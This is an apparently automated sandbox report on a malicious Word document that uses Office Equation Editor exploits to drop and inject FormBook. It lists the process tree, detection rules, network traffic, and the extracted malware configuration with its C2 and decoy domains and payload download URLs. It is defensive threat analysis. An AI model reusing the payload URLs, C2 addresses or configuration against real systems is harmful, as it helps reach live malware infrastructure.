
Windows Analysis Report
Order-1351125X.docx.doc

Overview

General Information

Sample name: Order-1351125X.docx.doc
Analysis ID: 1462365
MD5: e86424648b277754b74e507d51878e71
SHA1: e86498df0eb2a8514e0d55f9a33148779bf5b66d
SHA256: 3f9c2a2bac5e829fd61db15ffda44387442cd91f7d84bb3d8e28b19c9ac098b0
Tags: CVE-2017-0199, doc, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Unusual Parent Process For Cmd.EXE
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2732 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3156 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • nelb82019.scr (PID: 3216 cmdline: "C:\Users\user\AppData\Roaming\nelb82019.scr" MD5: 607868824F841FF4B6E24E997228D10D)
        • nelb82019.scr (PID: 3248 cmdline: "C:\Users\user\AppData\Roaming\nelb82019.scr" MD5: 607868824F841FF4B6E24E997228D10D)
          • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • wlanext.exe (PID: 3372 cmdline: "C:\Windows\SysWOW64\wlanext.exe" MD5: 6F44F5C0BC6B210FE5F5A1C8D899AD0A)
              • cmd.exe (PID: 3444 cmdline: /c del "C:\Users\user\AppData\Roaming\nelb82019.scr" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup
{"C2 list": ["www.cnoszirzbkaqz.com/btrd/"], "decoy": ["everslane.com", "prairieviewelectric.online", "dszvhgd.com", "papamuch.com", "8129k.vip", "jeffreestar.gold", "bestguestrentals.com", "nvzhuang1.net", "anangtoto.com", "yxfgor.top", "practicalpoppers.com", "thebestanglephotography.online", "koormm.top", "criika.net", "audioflow.online", "380747.net", "jiuguanwang.net", "bloxequities.com", "v321c.com", "sugar.monster", "agriwithai.com", "rd8.online", "texanboxes.com", "h7wlvwr4afx.top", "furryfriendsupply.store", "xmentorgroup.com", "runccl.com", "fairplaytavern.com", "concretecountertopsolutios.com", "wzxq.xyz", "outletivo.com", "studyasp.net", "pure1027.com", "xpffvn.cfd", "liposuctionclinics2.today", "rouchoug.top", "rifasgados.com", "tesourosobrerodas.site", "1stclasstv.net", "invest247on.com", "watch2movie.xyz", "martline.website", "naddafornadda.com", "drbtcbtc.com", "turbrun.com", "autounion999370.top", "wirewizardselectric.net", "0757hunyin.net", "researchforhighschool.com", "thedivorcesurvivalguide.com", "emeraldsurrogatefabric.com", "home-repair-contractors-kfm.xyz", "onlynaturlpt.shop", "agiletzal.site", "dylanmoranrules.com", "ngbbvuhkm5.asia", "proveedorafrac.com", "pho3nixkidsghana.com", "greatfightcompany.com", "hotnerdsg.com", "thecolourgrey.com", "librarylatte.com", "videomademagic.com", "coinrun.net"]}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\497AF0F0.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x2b6e9:$obj1: \objhtml
  • 0x2b70e:$obj2: \objdata
  • 0x2b724:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nelb[1].doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x2b6e9:$obj1: \objhtml
  • 0x2b70e:$obj2: \objdata
  • 0x2b724:$obj3: \objupdate
Source | Rule | Description | Author | Strings
0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b907:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18829:$sqlite3step: 68 34 1C 7B E1
  • 0x1893c:$sqlite3step: 68 34 1C 7B E1
  • 0x18858:$sqlite3text: 68 38 2A 90 C5
  • 0x1897d:$sqlite3text: 68 38 2A 90 C5
  • 0x1886b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18993:$sqlite3blob: 68 53 D8 7F 8C
Source | Rule | Description | Author | Strings
10.2.nelb82019.scr.860000.1.raw.unpack | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0x5866b:$x1: In$J$ct0r
10.2.nelb82019.scr.32a5770.5.unpack | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0x5686b:$x1: In$J$ct0r
10.2.nelb82019.scr.2296f6c.4.raw.unpack | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0xa48e4:$x1: In$J$ct0r
  • 0xa5830:$a1: WriteProcessMemory
  • 0xa58bc:$a1: WriteProcessMemory
  • 0xa5990:$a4: VirtualAllocEx
  • 0xa5bb4:$a4: VirtualAllocEx
  • 0xa5c34:$a4: VirtualAllocEx
10.2.nelb82019.scr.860000.1.unpack | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0x5686b:$x1: In$J$ct0r
10.2.nelb82019.scr.22997ac.3.raw.unpack | MALWARE_Win_DLInjector02 | Detects downloader injector | ditekSHen
  • 0xa20a4:$x1: In$J$ct0r
  • 0xa2ff0:$a1: WriteProcessMemory
  • 0xa307c:$a1: WriteProcessMemory
  • 0xa3150:$a4: VirtualAllocEx
  • 0xa3374:$a4: VirtualAllocEx
  • 0xa33f4:$a4: VirtualAllocEx

System Summary

Sigma rule matches:
Source: Network Connection | Author: Max Altgelt (Nextron Systems) | Data: DestinationIp: 104.21.74.191, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3156, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: "C:\Users\user\AppData\Roaming\nelb82019.scr", CommandLine: "C:\Users\user\AppData\Roaming\nelb82019.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\nelb82019.scr, NewProcessName: C:\Users\user\AppData\Roaming\nelb82019.scr, OriginalFileName: C:\Users\user\AppData\Roaming\nelb82019.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3156, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\nelb82019.scr", ProcessId: 3216, ProcessName: nelb82019.scr
Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3156, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scr
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49166, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 2732, Protocol: tcp, SourceIp: 172.67.162.95, SourceIsIpv6: false, SourcePort: 443
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3156, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scr
Source: Process started | Author: Tim Rauch | Data: Command: /c del "C:\Users\user\AppData\Roaming\nelb82019.scr", CommandLine: /c del "C:\Users\user\AppData\Roaming\nelb82019.scr", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\wlanext.exe", ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 3372, ParentProcessName: wlanext.exe, ProcessCommandLine: /c del "C:\Users\user\AppData\Roaming\nelb82019.scr", ProcessId: 3444, ProcessName: cmd.exe
Source: Registry Key set | Author: frack113 | Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2732, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2732, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Snort IDS alerts:
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
06/25/24-15:16:55.778410 | 2031412 | 49180 | 80 | TCP | A Network Trojan was detected
06/25/24-15:17:56.714740 | 2031412 | 49183 | 80 | TCP | A Network Trojan was detected
06/25/24-15:18:15.693590 | 2031412 | 49184 | 80 | TCP | A Network Trojan was detected
06/25/24-15:14:54.227212 | 2031412 | 49177 | 80 | TCP | A Network Trojan was detected
06/25/24-15:15:34.385117 | 2031412 | 49178 | 80 | TCP | A Network Trojan was detected
06/25/24-15:17:35.364789 | 2031412 | 49182 | 80 | TCP | A Network Trojan was detected
06/25/24-15:14:32.532373 | 2031412 | 49176 | 80 | TCP | A Network Trojan was detected
06/25/24-15:15:55.182689 | 2031412 | 49179 | 80 | TCP | A Network Trojan was detected
06/25/24-15:17:16.459709 | 2031412 | 49181 | 80 | TCP | A Network Trojan was detected

AV Detection

Source: http://www.cnoszirzbkaqz.com/btrd/www.naddafornadda.com | Avira URL Cloud: Label: malware
Source: https://universalmovies.top/nelb.scrj | Avira URL Cloud: Label: phishing
Source: https://universalmovies.top/nelb.scr | Avira URL Cloud: Label: malware
Source: http://www.cnoszirzbkaqz.com/btrd/ | Avira URL Cloud: Label: malware
Source: http://www.outletivo.com/btrd/www.380747.net | Avira URL Cloud: Label: malware
Source: http://www.outletivo.com/btrd/ | Avira URL Cloud: Label: malware
Source: https://universalmovies.top/nelb.scrll | Avira URL Cloud: Label: phishing
Source: http://www.outletivo.com/btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-vo | Avira URL Cloud: Label: malware
Source: http://www.cnoszirzbkaqz.com/btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-vo | Avira URL Cloud: Label: malware
Source: https://universalmovies.top/nelb.doc | Avira URL Cloud: Label: phishing
Source: http://www.agriwithai.com/btrd/www.ngbbvuhkm5.asia | Avira URL Cloud: Label: malware
Source: http://www.outletivo.com | Avira URL Cloud: Label: malware
Source: https://universalmovies.top/nelb.scrula | Avira URL Cloud: Label: phishing
Source: http://www.agriwithai.com/btrd/ | Avira URL Cloud: Label: malware
Source: www.cnoszirzbkaqz.com/btrd/ | Avira URL Cloud: Label: malware
Source: https://universalmovies.top/ | Avira URL Cloud: Label: phishing
Source: https://universalmovies.top/nelb.scriiC: | Avira URL Cloud: Label: phishing
Source: http://www.cnoszirzbkaqz.com | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp | Avira: detection malicious, Label: EXP/CVE-2018-0798.Gen
Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.cnoszirzbkaqz.com/btrd/"], "decoy": ["everslane.com", "prairieviewelectric.online", "dszvhgd.com", "papamuch.com", "8129k.vip", "jeffreestar.gold", "bestguestrentals.com", "nvzhuang1.net", "anangtoto.com", "yxfgor.top", "practicalpoppers.com", "thebestanglephotography.online", "koormm.top", "criika.net", "audioflow.online", "380747.net", "jiuguanwang.net", "bloxequities.com", "v321c.com", "sugar.monster", "agriwithai.com", "rd8.online", "texanboxes.com", "h7wlvwr4afx.top", "furryfriendsupply.store", "xmentorgroup.com", "runccl.com", "fairplaytavern.com", "concretecountertopsolutios.com", "wzxq.xyz", "outletivo.com", "studyasp.net", "pure1027.com", "xpffvn.cfd", "liposuctionclinics2.today", "rouchoug.top", "rifasgados.com", "tesourosobrerodas.site", "1stclasstv.net", "invest247on.com", "watch2movie.xyz", "martline.website", "naddafornadda.com", "drbtcbtc.com", "turbrun.com", "autounion999370.top", "wirewizardselectric.net", "0757hunyin.net", "researchforhighschool.com", "thedivorcesurvivalguide.com", "emeraldsurrogatefabric.com", "home-repair-contractors-kfm.xyz", "onlynaturlpt.shop", "agiletzal.site", "dylanmoranrules.com", "ngbbvuhkm5.asia", "proveedorafrac.com", "pho3nixkidsghana.com", "greatfightcompany.com", "hotnerdsg.com", "thecolourgrey.com", "librarylatte.com", "videomademagic.com", "coinrun.net"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scr | ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\nelb82019.scr | ReversingLabs: Detection: 36%
Source: Order-1351125X.docx.doc | ReversingLabs: Detection: 31%
Source: Yara match | File source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.923539816.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.410797383.0000000000250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.403289076.0000000003249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scr | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\nelb82019.scr | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00C07AD0 GetLastError,CryptUnprotectData,CryptUnprotectData,GetLastError,CryptUnprotectData,GetLastError,CryptProtectData,CryptProtectData,GetLastError,CryptProtectData,GetLastError,RpcImpersonateClient,LocalFree,LocalFree,LocalFree,14_2_00C07AD0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 14_2_00C0C953 GetLastError,CryptProtectData,14_2_00C0C953

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 104.21.74.191 Port: 443
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\nelb82019.scr
Source: ~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp.0.dr | Stream path '_1780811987/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb | source: nelb82019.scr, 0000000A.00000002.400627339.0000000000400000.00000004.08000000.00040000.00000000.sdmp, nelb82019.scr, 0000000A.00000002.403235071.0000000002241000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: nelb82019.scr, nelb82019.scr, 0000000B.00000002.410976071.0000000000910000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000E.00000002.923627309.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 0000000E.00000003.410817092.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 0000000E.00000003.411178144.0000000000A40000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wlanext.pdb | source: nelb82019.scr, 0000000B.00000002.410869004.0000000000544000.00000004.00000020.00020000.00000000.sdmp, nelb82019.scr, 0000000B.00000002.410776116.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, wlanext.exe, wlanext.exe, 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: global traffic | DNS query: name: universalmovies.top (14 identical entries)
Source: global traffic | DNS query: name: www.onlynaturlpt.shop
Source: global traffic | DNS query: name: www.wirewizardselectric.net
Source: global traffic | DNS query: name: www.cnoszirzbkaqz.com (2 identical entries)
Source: global traffic | DNS query: name: www.naddafornadda.com
Source: global traffic | DNS query: name: www.turbrun.com
Source: global traffic | DNS query: name: www.wzxq.xyz
Source: global traffic | DNS query: name: www.texanboxes.com
Source: global traffic | DNS query: name: www.outletivo.com
Source: global traffic | DNS query: name: www.380747.net
Source: global traffic | DNS query: name: www.emeraldsurrogatefabric.com (2 identical entries)
Source: global traffic | DNS query: name: www.furryfriendsupply.store
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
Source: global traffic | TCP traffic: 192.168.2.22:49176 -> 104.21.89.47:80
Source: global traffic | TCP traffic: 192.168.2.22:49177 -> 15.197.148.33:80
Source: global traffic | TCP traffic: 192.168.2.22:49178 -> 167.172.228.26:80
Source: global traffic | TCP traffic: 192.168.2.22:49179 -> 15.197.148.33:80
Source: global traffic | TCP traffic: 192.168.2.22:49180 -> 3.33.130.190:80
Source: global traffic | TCP traffic: 192.168.2.22:49181 -> 5.149.161.103:80
Source: global traffic | TCP traffic: 192.168.2.22:49182 -> 156.241.141.214:80
Source: global traffic | TCP traffic: 192.168.2.22:49183 -> 192.243.61.227:80
Source: global traffic | TCP traffic: 192.168.2.22:49166 -> 172.67.162.95:443 (12 identical entries)
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 172.67.162.95:443 (8 identical entries)
Source: global traffic | TCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443 (9 identical entries)
Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 172.67.162.95:443 (8 identical entries)
Source: global traffic | TCP traffic: 192.168.2.22:49170 -> 172.67.162.95:443 (8 identical entries)
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443 (37 identical entries)
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 172.67.162.95:443
